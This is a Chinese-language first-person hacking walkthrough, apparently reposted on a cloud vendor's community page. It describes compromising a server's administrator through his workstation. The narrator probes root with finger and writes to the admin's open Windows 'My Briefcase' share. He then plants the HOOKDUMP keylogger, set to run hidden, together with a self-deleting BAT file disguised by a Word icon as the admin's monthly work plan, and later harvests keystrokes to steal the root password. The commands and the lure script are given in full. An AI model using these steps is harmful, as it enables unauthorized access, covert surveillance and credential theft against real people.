駭客入侵Linux作業系統執行個體

來源:互聯網
上載者:User

我發現了一個網站,於是常規入侵。很好,它的FINGER開著,於是我編了一個SHELL,aaa帳號試到zzz(by the way,這是我發現的一個網上規律,那就是帳號的長度與口令的強度成正比, 如果一個帳號只有兩三位長,那它的口令一般也很簡單,反之亦然,故且稱之為若氏定理吧),結果一個帳號也不存在,我沒有再試它的帳號。因為我被它開的連接埠吸引住了,它開著WWW,我就不信它不出錯。一連拿了五種CGI和WWW掃描器總計掃了三四百種常見錯誤它幾乎都不存在還是看看root的資訊吧:

finger root@xxx.xxx.xxx

Login name: root In real life: system PRIVILEGED account

Directory: / Shell: /bin/sh

Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx

No Plan.

root經常來,那個202.xx.xx.xx就是他用的工作站了,從那會不會看到點東西呢?

net view \202.xx.xx.xx

Shared resources at \202.xx.xx.xx

Sharename Type Comment

x

x

我的公事包

The command was completed successfully.

在上網的機器上開著WINDOWS的“檔案和印表機共用”的服務,是很多人容易掉以輕心的,這個root沒有例外。如果它的C盤共用了而且可寫那就好了,但那是做夢,現在開了共用的目錄沒有一個是根目錄,連D驅的都沒有。別著急,慢慢來。x掉的那些檔案夾都沒用,不能寫,裡面儘是些英文原著,這個root還挺行的。“我的公事包”吸引了我的注意,這是一個用於將不同的機器上的資料進行同步的工具,很顯然這個root要經常更新主機上的首頁,有時候在自己的機器上編,有時候在主機上編……所以很重要的一點:“我的公事包”的共用一般都是可寫的!

那我再進去看看。

>net use i: \202.xx.xx.xx

>i:

>echo asdf>temp.txt

不錯,確實可寫。

>del temp.txt

不留痕迹——駭客的習慣。

>dir/od/p

看看都有些什麼…… 倒數第二排那個是什麼?“X月工作計劃.doc”!就是它了,既然是計劃就不可能寫完了就丟一邊,它肯定會再次開啟它的——至少下個月寫計劃時要COPY一下:->

該動手了,我的目標就是讓它下次開啟時誤中我的陷阱而運行我藏的木馬。我這次用的是一個鍵盤計錄軟體HOOKDUMP,我覺得它挺好的,價錢實惠,量也足…… 對不起,說習慣了,應該是它不僅記錄下全部擊鍵,還記錄下開啟或關掉了什麼程式、按過什麼按紐、用過什麼菜單…… 總之,它的記錄讓你就和你站在他身後看他操作電腦一樣詳細了。您要問那麼多木馬你為啥裝這個?要知道無論是中國的冰河、netspy還是外國的netbus、BO,都被各種殺毒軟體列為頭號偵查對象,而一個root的機器上可不可能沒裝殺毒軟體?還是HOOKDUMP好,小小的,不起眼,不過如果大家都用只怕我再用它的機會就少了……

>copy hookdump.* i:

補充一點:上傳前先編好它的hookdump.ini檔案,置為隱藏方式運行,不然root一運行螢幕上蹦出一大視窗可就……。

然後再在自己的機器上編一個同名的BAT檔案:X月工作計劃.BAT

>edit c:X月工作計劃.BAT

@echo off

hookdump

attrib -h X月工作計劃.doc

C:Program FilesMicrosoftOfficeWinword X月工作計劃.doc

attrib -h temp.bat

del temp.pif

del temp.bat

看明白了吧?root運行了這個BAT檔案實際上就是先運行木馬,再調用WINWORD檔案開啟它想開的這個檔案,然後自我刪除,也許它機器上WINWORD的位置不同,那調用就會失敗,不過不要緊,反正BAT會馬上刪除,他會以為是自己的誤操作。

這時你的C驅根目錄就有了這麼一個BAT檔案,它是一個方形的表徵圖,和那個WORD檔案大相徑庭,root怎麼會運行它呢?沒關係,在這個檔案上點右鍵,點屬性,在“程式”欄選“更改表徵圖”不就行了嗎?WORD的表徵圖在你機器C:Program FilesMicrosoftOffice中。還要將“運行”改為“最小化”,“退出時關閉”打上勾,這樣才能保證在運行時一點跡象也沒有。事實上這個BAT檔案變成了兩個,還有一個PIF檔案就是它的表徵圖。

把這兩個檔案傳上去:

>copy X月工作計劃.bat i:

>copy X月工作計劃.pif i:

然後把它的檔案和自己的檔案都藏起來:

>attrib +h X月工作計劃.doc

>attrib +h X月工作計劃.bat

這樣,root的“公事包”裡只剩下一個和原來一模一樣的WORD表徵圖,他做夢也沒想到這已變成了一個BAT檔案。然後可以喘口氣了,讓我們靜靜的等……

幾天后,我進入這個工作站,取下記錄下來的擊鍵記錄,找出root的口令,進入主機。

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.